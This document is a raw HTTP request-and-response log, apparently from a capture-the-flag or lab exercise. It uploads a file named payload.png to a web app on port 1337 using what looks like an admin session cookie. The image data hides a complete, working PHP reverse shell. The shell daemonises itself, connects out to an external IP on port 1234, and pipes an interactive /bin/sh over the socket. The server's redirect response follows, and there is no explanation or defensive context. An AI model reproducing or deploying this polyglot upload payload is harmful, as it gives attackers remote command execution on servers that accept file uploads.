POST / HTTP/1.1Host: 138.68.187.191:1337User-Agent: Mozilla/5.0 (Windows NT

1. POST / HTTP/1.1
2. Host: 138.68.187.191:1337
3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
5. Accept-Language: en-US,en;q=0.5
6. Accept-Encoding: gzip, deflate
7. Referer: http://138.68.187.191:1337/
8. Content-Type: multipart/form-data; boundary=---------------------------20501827029678
9. Content-Length: 3965
10. Connection: keep-alive
11. Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0.XLCPLQ.YxytijoFlpOqpx74Wzd_Q5TtucU
12. Upgrade-Insecure-Requests: 1
13.  
14. -----------------------------20501827029678
15. Content-Disposition: form-data; name="file"; filename="payload.png"
16. Content-Type: image/png
17.  
18. .PNG
19. .
20. ...
21. IHDR... ... ............ pHYs..........+.....`IDATH.c\<?<?php
22.  
23. <?php
24.  
25. set_time_limit (0);
26. $VERSION = "1.0";
27. $ip = '34.242.79.196'; // CHANGE THIS
28. $port = 1234; // CHANGE THIS
29. $chunk_size = 1400;
30. $write_a = null;
31. $error_a = null;
32. $shell = 'uname -a; w; id; /bin/sh -i';
33. $daemon = 0;
34. $debug = 0;
35.  
36. //
37. // Daemonise ourself if possible to avoid zombies later
38. //
39.  
40. // pcntl_fork is hardly ever available, but will allow us to daemonise
41. // our php process and avoid zombies. Worth a try...
42. if (function_exists('pcntl_fork')) {
43. // Fork and have the parent process exit
44. $pid = pcntl_fork();
45.  
46. if ($pid == -1) {
47. printit("ERROR: Can't fork");
48. exit(1);
49. }
50.  
51. if ($pid) {
52. exit(0); // Parent exits
53. }
54.  
55. // Make the current process a session leader
56. // Will only succeed if we forked
57. if (posix_setsid() == -1) {
58. printit("Error: Can't setsid()");
59. exit(1);
60. }
61.  
62. $daemon = 1;
63. } else {
64. printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
65. }
66.  
67. // Change to a safe directory
68. chdir("/");
69.  
70. // Remove any umask we inherited
71. umask(0);
72.  
73. //
74. // Do the reverse shell...
75. //
76.  
77. // Open reverse connection
78. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
79. if (!$sock) {
80. printit("$errstr ($errno)");
81. exit(1);
82. }
83.  
84. // Spawn shell process
85. $descriptorspec = array(
86. 0 => array("pipe", "r"), // stdin is a pipe that the child will read from
87. 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
88. 2 => array("pipe", "w") // stderr is a pipe that the child will write to
89. );
90.  
91. $process = proc_open($shell, $descriptorspec, $pipes);
92.  
93. if (!is_resource($process)) {
94. printit("ERROR: Can't spawn shell");
95. exit(1);
96. }
97.  
98. // Set everything to non-blocking
99. // Reason: Occsionally reads will block, even though stream_select tells us they won't
100. stream_set_blocking($pipes[0], 0);
101. stream_set_blocking($pipes[1], 0);
102. stream_set_blocking($pipes[2], 0);
103. stream_set_blocking($sock, 0);
104.  
105. printit("Successfully opened reverse shell to $ip:$port");
106.  
107. while (1) {
108. // Check for end of TCP connection
109. if (feof($sock)) {
110. printit("ERROR: Shell connection terminated");
111. break;
112. }
113.  
114. // Check for end of STDOUT
115. if (feof($pipes[1])) {
116. printit("ERROR: Shell process terminated");
117. break;
118. }
119.  
120. // Wait until a command is end down $sock, or some
121. // command output is available on STDOUT or STDERR
122. $read_a = array($sock, $pipes[1], $pipes[2]);
123. $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
124.  
125. // If we can read from the TCP socket, send
126. // data to process's STDIN
127. if (in_array($sock, $read_a)) {
128. if ($debug) printit("SOCK READ");
129. $input = fread($sock, $chunk_size);
130. if ($debug) printit("SOCK: $input");
131. fwrite($pipes[0], $input);
132. }
133.  
134. // If we can read from the process's STDOUT
135. // send data down tcp connection
136. if (in_array($pipes[1], $read_a)) {
137. if ($debug) printit("STDOUT READ");
138. $input = fread($pipes[1], $chunk_size);
139. if ($debug) printit("STDOUT: $input");
140. fwrite($sock, $input);
141. }
142.  
143. // If we can read from the process's STDERR
144. // send data down tcp connection
145. if (in_array($pipes[2], $read_a)) {
146. if ($debug) printit("STDERR READ");
147. $input = fread($pipes[2], $chunk_size);
148. if ($debug) printit("STDERR: $input");
149. fwrite($sock, $input);
150. }
151. }
152.  
153. fclose($sock);
154. fclose($pipes[0]);
155. fclose($pipes[1]);
156. fclose($pipes[2]);
157. proc_close($process);
158.  
159. // Like print, but does nothing if we've daemonised ourself
160. // (I can't figure out how to redirect STDOUT like a proper daemon)
161. function printit ($string) {
162. if (!$daemon) {
163. print "$string\n";
164. }
165. }
166.  
167. ?>
168.  
169.  
170.  
171.  
172. ?>X....s^7.....~_.}.'....._..|.00c..g..=..2..Q0
173. F.(...`...Q0
174. .
175. .......x
176. .....IEND.B`.
177. -----------------------------20501827029678--
178. HTTP/1.0 302 FOUND
179. Content-Type: text/html; charset=utf-8
180. Content-Length: 209
181. Location: http://138.68.187.191:1337/
182. Server: Werkzeug/0.14.1 Python/2.7.15rc1
183. Date: Sun, 14 Apr 2019 20:20:11 GMT
184.  
185. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
186. <title>Redirecting...</title>
187. <h1>Redirecting...</h1>
188. <p>You should be redirected automatically to target URL: <a href="/">/</a>. If not click the link.